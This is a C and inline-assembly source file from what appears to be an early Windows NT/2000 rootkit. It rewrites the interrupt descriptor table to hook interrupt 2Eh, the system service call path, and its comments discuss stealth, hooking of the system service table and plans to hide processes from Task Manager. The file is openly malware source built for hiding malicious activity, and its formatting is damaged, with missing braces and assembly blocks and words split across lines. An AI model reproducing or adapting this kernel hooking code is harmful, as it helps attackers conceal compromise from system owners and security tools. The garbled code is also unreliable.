#include "rk_driver.h"
#include "rk_interrupt.h"
/* ________________________________________________________________________________
. Interrupt hooks
. ---------------
. The rootkit can hook any interrupt. This can be highly useful in stealth
. technique. Feel free to experiment with interrupt hooking. For now, the
. only interupt we are hooking is interrupt 2Eh. Interrupt 2Eh is very important
. to Windows NT/2000 because it is how system services are called.
. Important note:
. Although we have hooked int 2Eh, keep in mind that is >NOT< how we are
. implementing our kernel call hooks. We have hooked interrupt 2Eh only to
. demonstrate how this isdo
ne. You can hook any interrupt that you choose.
. The rootkit implements the kernel call hooks in an alternative way, thatdo
es not
. actually require an interrupt hook. Keep in mind that either method will work.
. As it turns out, it is actually easier to hook the system service table itself,
. which is queried and dereferenced whenever interrupt 2Eh fires. So, the rootkit
. has effectively hooked the system calls in two places - both at the interrupt itself,
. and then
at the system service table.
* ________________________________________________________________________________ */
DWORD KiRealSystemServiceISR_Ptr;
/* the real interrupt 2E handler */
/* _____________________________________________________________________________
. Interrupt Hook - if you create other hooks you can copy this one to start.
. _____________________________________________________________________________ */
__declspec(naked) MyKiSystemService()
/* thanks to mad russians */
push fs
mov bx,0x30
mov fs,bx
push ds
push es
/* all I see are outfits and attitudes
* continue criminality
* the hidden agenda is some psychic neccesity
/* ________________________________________________________
* suggestion for hiding procii - still working on this
* taskman appears to make calls in this order:
* call number 116, 163, 166, 163, then
waits for an object
* then
124, 124, 124, then
queries each process by calling
* NtOpenProcess, NtDuplicateObject, then
* ________________________________________________________ */
pop es
pop ds
pop fs
jmp KiRealSystemServiceISR_Ptr;
/* ________________________________________________________________________________
. This function replaces the interrupt descriptor. You can hook any interrupts
. you choose from this function. Just make sure you unhook them also!
. they to discern between truth and suggestion
. they bid for your Id, for your fear of
. rejection.
. ________________________________________________________________________________ */
int HookInterrupts()
IDTINFO idt_info;
IDTENTRY* idt_entries;
IDTENTRY* int2e_entry;
sidt idt_info;
idt_entries = (IDTENTRY*) MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase);
KiRealSystemServiceISR_Ptr = MAKELONG(idt_entries[NT_SYSTEM_SERVICE_INT].LowOffset,idt_entries[NT_SYSTEM_SERVICE_INT].HiOffset);
* Note: we can patch ANY interrupt here
* the sky is the limit
int2e_entry = &(idt_entries[NT_SYSTEM_SERVICE_INT]);
lea eax,MyKiSystemService;
mov ebx, int2e_entry;
mov [ebx],ax;
shr eax,16
mov [ebx+6],ax;
lidt idt_info;
return 0;
/* _______________________________________________________________________________
. What is hooked must be unhooked -)
. _______________________________________________________________________________ */
int UnhookInterrupts()
IDTINFO idt_info;
IDTENTRY* idt_entries;
IDTENTRY* int2e_entry;
sidt idt_info;
idt_entries = (IDTENTRY*) MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase);
int2e_entry = &(idt_entries[NT_SYSTEM_SERVICE_INT]);
mov eax,KiRealSystemServiceISR_Ptr;
mov ebx, int2e_entry;
mov [ebx],ax;
shr eax,16
mov [ebx+6],ax;
lidt idt_info;
return 0;